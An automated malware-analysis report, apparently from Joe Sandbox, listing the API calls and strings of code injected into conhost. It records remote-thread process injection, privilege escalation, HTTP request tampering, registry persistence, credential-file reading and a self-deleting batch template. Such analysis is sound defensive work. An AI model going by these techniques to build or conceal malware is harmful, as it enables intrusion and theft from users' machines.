Part of subcall function 000BD4B4: ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 000BDC67

Part of subcall function 000BDF74: DeleteObject.GDI32(00000000), ref: 000BDF87
Part of subcall function 000BDF74: CloseHandle.KERNEL32(00000000), ref: 000BDF97
Part of subcall function 000BDF74: TlsFree.KERNEL32(00000000,00000000,000D2868,00000000,000BE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 000BDFA2
Part of subcall function 000BDF74: CloseHandle.KERNEL32(00000000), ref: 000BDFB0
Part of subcall function 000BDF74: UnmapViewOfFile.KERNEL32(00000000,00000000,000D2868,00000000,000BE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 000BDFBA
Part of subcall function 000BDF74: CloseHandle.KERNEL32(00000000), ref: 000BDFC7
Part of subcall function 000BDF74: SelectObject.GDI32(00000000,00000000), ref: 000BDFE1
Part of subcall function 000BDF74: DeleteObject.GDI32(00000000), ref: 000BDFF2
Part of subcall function 000BDF74: DeleteDC.GDI32(00000000), ref: 000BDFFF
Part of subcall function 000BDF74: CloseHandle.KERNEL32(00000000), ref: 000BE010
Part of subcall function 000BDF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 000BE01F
Part of subcall function 000BDF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 000BE038

Part of subcall function 000C65B7: recv.WS2_32(?,?,00000400,00000000), ref: 000C6600
Part of subcall function 000C65B7: #19.WS2_32(?,?,00000000,00000000), ref: 000C661A
Part of subcall function 000C65B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 000C6657

Part of subcall function 000C675E: shutdown.WS2_32(?,00000002), ref: 000C6766
Part of subcall function 000C675E: #3.WS2_32(?), ref: 000C676D

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Part of subcall function 000C67B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 000C67CC

Part of subcall function 000C6774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 000C67A7

Part of subcall function 000C6403: socket.WS2_32(?,00000001,00000006), ref: 000C640C
Part of subcall function 000C6403: connect.WS2_32(00000000,?,-0000001D), ref: 000C642C
Part of subcall function 000C6403: #3.WS2_32(00000000,?,?,?,000B7518,?), ref: 000C6437

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CA6AF, Relevance: 12.2, APIs: 8, Instructions: 165

APIs

Part of subcall function 000CA594: HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 000CA5F4

Part of subcall function 000C1049: EnterCriticalSection.KERNEL32(000D2AC8), ref: 000C1064
Part of subcall function 000C1049: LeaveCriticalSection.KERNEL32(000D2AC8), ref: 000C10E7
Part of subcall function 000C1049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 000C11B2
Part of subcall function 000C1049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 000C13EC

SetLastError.KERNEL32(00002F78), ref: 000CA6F6
HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 000CA762
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 000CA77E
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 000CA795
EnterCriticalSection.KERNEL32(000D3F24), ref: 000CA79D
LeaveCriticalSection.KERNEL32(000D3F24,?), ref: 000CA853

Part of subcall function 000C5048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 000C506A
Part of subcall function 000C5048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 000C508C
Part of subcall function 000C5048: InternetCloseHandle.WININET(?), ref: 000C5094

Part of subcall function 000C1C3C: CreateThread.KERNEL32(00000000,00000000,Function_00011A04,?,00000000,00000000), ref: 000C1C81
Part of subcall function 000C1C3C: CloseHandle.KERNEL32(?), ref: 000C1C9A

EnterCriticalSection.KERNEL32(000D3F24), ref: 000CA87A
LeaveCriticalSection.KERNEL32(000D3F24,?), ref: 000CA8BA

Part of subcall function 000C9C3C: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,000D3F24,000CA893,?), ref: 000C9CB1

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C31CC, Relevance: 12.1, APIs: 8, Instructions: 114

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000C31ED
Process32FirstW.KERNEL32(000001E6,?), ref: 000C3216

Part of subcall function 000C245B: CreateMutexW.KERNEL32(000D2C30,00000001,?,000D2E70,76C605D7,?,00000002,?,76C605D7), ref: 000C24A3
Part of subcall function 000C245B: GetLastError.KERNEL32 ref: 000C24AF
Part of subcall function 000C245B: CloseHandle.KERNEL32(00000000), ref: 000C24BD

OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 000C3271
CloseHandle.KERNEL32(?), ref: 000C330E

Part of subcall function 000C49D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,000C2326,000000FF,000D2C08,?,?,00000000), ref: 000C49E2
Part of subcall function 000C49D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,000C2326,000000FF,000D2C08), ref: 000C4A0E
Part of subcall function 000C49D2: CloseHandle.KERNEL32(?), ref: 000C4A23

CloseHandle.KERNEL32(00000000), ref: 000C328E
GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 000C32A1

Part of subcall function 000C3346: HeapAlloc.KERNEL32(00000008,-00000003,000C36F5,?,?,00000000,000C41E1,?,000C2070,?,?,?,000C4191,?,?,?), ref: 000C3368
Part of subcall function 000C3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,000C36F5,?,?,00000000,000C41E1,?,000C2070,?,?,?,000C4191,?,?), ref: 000C3379

Part of subcall function 000C3048: OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 000C3157
Part of subcall function 000C3048: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00195903,00000000,00000000,00000000), ref: 000C3185
Part of subcall function 000C3048: WaitForSingleObject.KERNEL32(00000000,00002710), ref: 000C3198
Part of subcall function 000C3048: CloseHandle.KERNEL32(?), ref: 000C31A1
Part of subcall function 000C3048: VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 000C31B5
Part of subcall function 000C3048: CloseHandle.KERNEL32(00000000), ref: 000C31BC

Process32NextW.KERNEL32(000001E6,0000022C), ref: 000C331A
CloseHandle.KERNEL32(000001E6), ref: 000C332B

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BB11C, Relevance: 12.1, APIs: 8, Instructions: 107

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 000BB130
ReleaseMutex.KERNEL32(?), ref: 000BB14F
GetWindowRect.USER32(?,?), ref: 000BB15C
IsRectEmpty.USER32(?), ref: 000BB1E0
GetWindowLongW.USER32(?,000000F0), ref: 000BB1EF
GetParent.USER32(?), ref: 000BB205
MapWindowPoints.USER32(00000000,00000000), ref: 000BB20E
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 000BB232

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C14C3, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 367

APIs

Part of subcall function 000C433F: CharLowerA.USER32(00000000), ref: 000C4420
Part of subcall function 000C433F: CharLowerA.USER32(?), ref: 000C442D

Part of subcall function 000C3346: HeapAlloc.KERNEL32(00000008,-00000003,000C36F5,?,?,00000000,000C41E1,?,000C2070,?,?,?,000C4191,?,?,?), ref: 000C3368
Part of subcall function 000C3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,000C36F5,?,?,00000000,000C41E1,?,000C2070,?,?,?,000C4191,?,?), ref: 000C3379

Part of subcall function 000C7FE1: StrCmpNIA.SHLWAPI(00000001,nbsp;,00000005), ref: 000C8104

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

InternetCrackUrlA.WININET ref: 000C17AC
GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 000C17CA

Part of subcall function 000C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000C40CF

LeaveCriticalSection.KERNEL32(000D2AC8,?,?), ref: 000C194D

Part of subcall function 000C4660: CryptAcquireContextW.ADVAPI32(000C8C87,00000000,00000000,00000001,F0000040,?,000C8C87,?,00000030,?,?,?,000C91A0,000D3EC0), ref: 000C4679
Part of subcall function 000C4660: CryptCreateHash.ADVAPI32(000C8C87,00008003,00000000,00000000,00000030,?,000C8C87,?,00000030,?,?,?,000C91A0,000D3EC0), ref: 000C4691
Part of subcall function 000C4660: CryptHashData.ADVAPI32(00000030,00000010,000C8C87,00000000,?,000C8C87), ref: 000C46AD
Part of subcall function 000C4660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,000C8C87), ref: 000C46C5
Part of subcall function 000C4660: CryptDestroyHash.ADVAPI32(00000030,?,000C8C87), ref: 000C46DC
Part of subcall function 000C4660: CryptReleaseContext.ADVAPI32(000C8C87,00000000,?,000C8C87,?,00000030,?,?,?,000C91A0,000D3EC0), ref: 000C46E6

GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 000C18E4

Part of subcall function 000C763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,000C9EAB,?,?,00000004), ref: 000C7658
Part of subcall function 000C763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,000C9EAB,?,?,000C9EAB,?,?,00000004,?,00000004), ref: 000C7672
Part of subcall function 000C763A: RegCloseKey.ADVAPI32(00000004,?,?,000C9EAB,?,?,00000004,?,00000004), ref: 000C7681

EnterCriticalSection.KERNEL32(000D2AC8), ref: 000C1910

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Strings

?*, xrefs: 000C14FD

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B63F0, Relevance: 10.7, APIs: 7, Instructions: 216

APIs

Part of subcall function 000C2507: CreateMutexW.KERNEL32(000D2C30,00000000,?,?,?,?,?), ref: 000C2528

Part of subcall function 000C262D: WaitForSingleObject.KERNEL32(00000000,000B776D), ref: 000C2635

Part of subcall function 000B5ECF: PathRemoveFileSpecW.SHLWAPI(000D25D0), ref: 000B5F07
Part of subcall function 000B5ECF: PathRenameExtensionW.SHLWAPI(00000000,.tmp), ref: 000B5F23
Part of subcall function 000B5ECF: GetFileAttributesW.KERNEL32(000D23C8,000D25D0,000D25D0,00000000,00020000,000B69C9,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 000B5F46

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000330,?,?,00000102), ref: 000B6538
GetFileAttributesW.KERNEL32(000D23C8), ref: 000B654B
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 000B6571
CloseHandle.KERNEL32(00000000), ref: 000B658F
lstrcmpiW.KERNEL32(?,?), ref: 000B65BF
MoveFileExW.KERNEL32(?,?,0000000B), ref: 000B65E7

Part of subcall function 000B6BD7: RegOpenKeyExW.ADVAPI32(80000001,000D27F0,00000000,00000001,?,?), ref: 000B6C00

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Part of subcall function 000B6010: GetTickCount.KERNEL32(0000271B,00020000,00000000,00002719,00020000,00000000,00000000,000000FF,00000000), ref: 000B610F
Part of subcall function 000B6010: GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,000000FF,00000000), ref: 000B6162
Part of subcall function 000B6010: GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,000000FF,00000000), ref: 000B61A4
Part of subcall function 000B6010: GetUserNameExW.SECUR32(00000002,?,00000104), ref: 000B61E6

Part of subcall function 000B680D: WaitForSingleObject.KERNEL32(?,00001388), ref: 000B685A
Part of subcall function 000B680D: Sleep.KERNEL32(00001388,?,?,?,00000000,?,?,-78D0C214,00000002), ref: 000B6869

Part of subcall function 000C9354: FlushFileBuffers.KERNEL32(00000000), ref: 000C9360
Part of subcall function 000C9354: CloseHandle.KERNEL32(?), ref: 000C9368

Part of subcall function 000C8716: SetFileAttributesW.KERNEL32(00000080,00000080,000CB4CD,?), ref: 000C871F
Part of subcall function 000C8716: DeleteFileW.KERNEL32(?), ref: 000C8729

Part of subcall function 000C86EF: GetFileSizeEx.KERNEL32(000C925C,000C925C,?,?,?,000C925C,00000000), ref: 000C86FB

WaitForSingleObject.KERNEL32(00007530,?), ref: 000B668B

Part of subcall function 000C6B8E: ReleaseMutex.KERNEL32(00000000,000C3021,?,?,?), ref: 000C6B92

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C8AE4, Relevance: 10.6, APIs: 7, Instructions: 109

APIs

Part of subcall function 000C8C40: PathCombineW.SHLWAPI(000C1F45,000C1F45,?), ref: 000C8C5F

FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 000C8B23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 000C8B4A

Part of subcall function 000C8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 000C8B94
Part of subcall function 000C8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 000C8BC1
Part of subcall function 000C8AE4: Sleep.KERNEL32(00000000,?,?), ref: 000C8BF1

FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 000C8C1F
FindClose.KERNEL32(?,?,?,?,00000000), ref: 000C8C31

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C4E7B, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85

APIs

Part of subcall function 000C8737: GetTempPathW.KERNEL32(000000F6,?), ref: 000C874E

CharToOemW.USER32(?,?), ref: 000C4EAB
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 000C4F2F

Part of subcall function 000C8716: SetFileAttributesW.KERNEL32(00000080,00000080,000CB4CD,?), ref: 000C871F
Part of subcall function 000C8716: DeleteFileW.KERNEL32(?), ref: 000C8729

Part of subcall function 000C856B: CreateFileW.KERNEL32(000C4E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 000C8585
Part of subcall function 000C856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000C85A8
Part of subcall function 000C856B: CloseHandle.KERNEL32(00000000), ref: 000C85B5

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Part of subcall function 000C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000C40CF

Strings

bat, xrefs: 000C4E8B
/c "%s", xrefs: 000C4F01
ComSpec, xrefs: 000C4F2A
@echo off%sdel /F "%s", xrefs: 000C4EBE

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C795E, Relevance: 10.6, APIs: 7, Instructions: 65

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 000C797D
PathAddBackslashW.SHLWAPI(?), ref: 000C7994
PathRemoveBackslashW.SHLWAPI(?), ref: 000C79A5
PathRemoveFileSpecW.SHLWAPI(?), ref: 000C79B2
PathAddBackslashW.SHLWAPI(?), ref: 000C79C3
GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000064), ref: 000C79D2
CLSIDFromString.OLE32(?,?), ref: 000C79EC

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C78D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60

APIs

RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 000C78FD

Part of subcall function 000C773A: CharUpperW.USER32(00000000), ref: 000C785B

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 000C792F
RegCloseKey.ADVAPI32(?), ref: 000C7938
RegCloseKey.ADVAPI32(?), ref: 000C7952

Strings

SOFTWARE\Microsoft, xrefs: 000C78F0
d, xrefs: 000C7943

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C4A87, Relevance: 10.6, APIs: 7, Instructions: 52

APIs

GetCurrentThread.KERNEL32(00000020,00000000,000CC9A1,00000000,?,?,?,?,000CC9A1,SeTcbPrivilege), ref: 000C4A97
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,000CC9A1,SeTcbPrivilege), ref: 000C4A9E
OpenProcessToken.ADVAPI32(000000FF,00000020,000CC9A1,?,?,?,?,000CC9A1,SeTcbPrivilege), ref: 000C4AB0
LookupPrivilegeValueW.ADVAPI32(00000000,000CC9A1,?), ref: 000C4AD4
AdjustTokenPrivileges.ADVAPI32(000CC9A1,00000000,00000001,00000000,00000000,00000000), ref: 000C4AE9
GetLastError.KERNEL32 ref: 000C4AF3
CloseHandle.KERNEL32(000CC9A1), ref: 000C4B02

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C6A3C, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43

APIs

Part of subcall function 000C4A87: GetCurrentThread.KERNEL32(00000020,00000000,000CC9A1,00000000,?,?,?,?,000CC9A1,SeTcbPrivilege), ref: 000C4A97
Part of subcall function 000C4A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,000CC9A1,SeTcbPrivilege), ref: 000C4A9E
Part of subcall function 000C4A87: OpenProcessToken.ADVAPI32(000000FF,00000020,000CC9A1,?,?,?,?,000CC9A1,SeTcbPrivilege), ref: 000C4AB0
Part of subcall function 000C4A87: LookupPrivilegeValueW.ADVAPI32(00000000,000CC9A1,?), ref: 000C4AD4
Part of subcall function 000C4A87: AdjustTokenPrivileges.ADVAPI32(000CC9A1,00000000,00000001,00000000,00000000,00000000), ref: 000C4AE9
Part of subcall function 000C4A87: GetLastError.KERNEL32 ref: 000C4AF3
Part of subcall function 000C4A87: CloseHandle.KERNEL32(000CC9A1), ref: 000C4B02

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 000C6A5B
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 000C6A77
SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 000C6A8E
LocalFree.KERNEL32(00000000), ref: 000C6A9D

Strings

S:(ML;CIOI;NRNWNX;;;LW), xrefs: 000C6A56
SeSecurityPrivilege, xrefs: 000C6A43

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BB31C, Relevance: 9.2, APIs: 6, Instructions: 197

APIs

GetAncestor.USER32(?,00000002), ref: 000BB345
SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 000BB370
PostMessageW.USER32(?,00000020,?,00000000), ref: 000BB3B2

Part of subcall function 000BB23D: GetTickCount.KERNEL32 ref: 000BB2A3
Part of subcall function 000BB23D: GetClassLongW.USER32(?,000000E6), ref: 000BB2D8

GetWindowThreadProcessId.USER32(?,00000000), ref: 000BB448
PostMessageW.USER32(?,00000112,?,?), ref: 000BB49B
GetWindowThreadProcessId.USER32(?,00000000), ref: 000BB4DA

Part of subcall function 000BB0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 000BB0B3
Part of subcall function 000BB0AD: ReleaseMutex.KERNEL32(?), ref: 000BB0E7
Part of subcall function 000BB0AD: IsWindow.USER32(?), ref: 000BB0EE
Part of subcall function 000BB0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 000BB108
Part of subcall function 000BB0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 000BB110

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B9694, Relevance: 9.2, APIs: 6, Instructions: 175

APIs

Part of subcall function 000C8C40: PathCombineW.SHLWAPI(000C1F45,000C1F45,?), ref: 000C8C5F

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 000B9709
StrStrIW.SHLWAPI(?,?), ref: 000B9796
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 000B97BE
GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 000B97DB
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 000B980C
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 000B982D

Part of subcall function 000C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000C40CF

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CA3B1, Relevance: 9.2, APIs: 6, Instructions: 153

APIs

EnterCriticalSection.KERNEL32(000D3F24), ref: 000CA3C2
LeaveCriticalSection.KERNEL32(000D3F24), ref: 000CA425

Part of subcall function 000CA298: ResetEvent.KERNEL32(?), ref: 000CA2A6
Part of subcall function 000CA298: InternetSetStatusCallbackW.WININET(?,000CA24F), ref: 000CA2DB
Part of subcall function 000CA298: InternetReadFileExA.WININET ref: 000CA31B
Part of subcall function 000CA298: GetLastError.KERNEL32 ref: 000CA325
Part of subcall function 000CA298: InternetSetStatusCallbackW.WININET(?,?), ref: 000CA389

EnterCriticalSection.KERNEL32(000D3F24), ref: 000CA442
GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 000CA4C6

Part of subcall function 000C856B: CreateFileW.KERNEL32(000C4E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 000C8585
Part of subcall function 000C856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000C85A8
Part of subcall function 000C856B: CloseHandle.KERNEL32(00000000), ref: 000C85B5

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Part of subcall function 000C54F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 000C5505
Part of subcall function 000C54F1: GetLastError.KERNEL32 ref: 000C550F
Part of subcall function 000C54F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 000C552F

Part of subcall function 000C14C3: InternetCrackUrlA.WININET ref: 000C17AC
Part of subcall function 000C14C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 000C17CA
Part of subcall function 000C14C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 000C18E4
Part of subcall function 000C14C3: EnterCriticalSection.KERNEL32(000D2AC8), ref: 000C1910
Part of subcall function 000C14C3: LeaveCriticalSection.KERNEL32(000D2AC8,?,?), ref: 000C194D

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

SetLastError.KERNEL32(00002EE4), ref: 000CA51C
LeaveCriticalSection.KERNEL32(000D3F24), ref: 000CA585

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B929D, Relevance: 9.1, APIs: 6, Instructions: 148

APIs

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 000B92D4
StrStrIW.SHLWAPI(?,?), ref: 000B935C
StrStrIW.SHLWAPI(?,?), ref: 000B936D
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 000B9389
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 000B93A7
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 000B93C1

Part of subcall function 000C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000C40CF

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C1049, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 395

APIs

EnterCriticalSection.KERNEL32(000D2AC8), ref: 000C1064
LeaveCriticalSection.KERNEL32(000D2AC8), ref: 000C10E7
InternetCrackUrlA.WININET(?,?,00000000,?), ref: 000C11B2

Part of subcall function 000CAE54: EnterCriticalSection.KERNEL32(000D3FB4,?,000C11CF,?), ref: 000CAE5B
Part of subcall function 000CAE54: LeaveCriticalSection.KERNEL32(000D3FB4), ref: 000CAE90

Part of subcall function 000CAE9A: EnterCriticalSection.KERNEL32(000D3FB4,?,00000000,000C13AE,00000000), ref: 000CAEA6
Part of subcall function 000CAE9A: LeaveCriticalSection.KERNEL32(000D3FB4), ref: 000CAEF1

InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 000C13EC

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Part of subcall function 000C0AA1: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 000C0C73
Part of subcall function 000C0AA1: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 000C0C93
Part of subcall function 000C0AA1: RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 000C0CA6
Part of subcall function 000C0AA1: GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 000C0CB5

Part of subcall function 000C9B3E: CreateMutexW.KERNEL32(Function_00022C30,00000000,000D3F40,?,?,?,000B79E5), ref: 000C9B66

Strings

, xrefs: 000C1301

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CD325, Relevance: 9.1, APIs: 6, Instructions: 78

APIs

Part of subcall function 000C2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 000C28A1

PathRemoveFileSpecW.SHLWAPI(?), ref: 000CD34A
PathRemoveFileSpecW.SHLWAPI(?), ref: 000CD35D

Part of subcall function 000CC86B: SetEvent.KERNEL32(000CD36D,00000000), ref: 000CC871
Part of subcall function 000CC86B: WaitForSingleObject.KERNEL32(00000094,000000FF), ref: 000CC884

Part of subcall function 000BBCAF: SHDeleteValueW.SHLWAPI(80000001,?,?), ref: 000BBCEC
Part of subcall function 000BBCAF: Sleep.KERNEL32(000001F4), ref: 000BBCFB
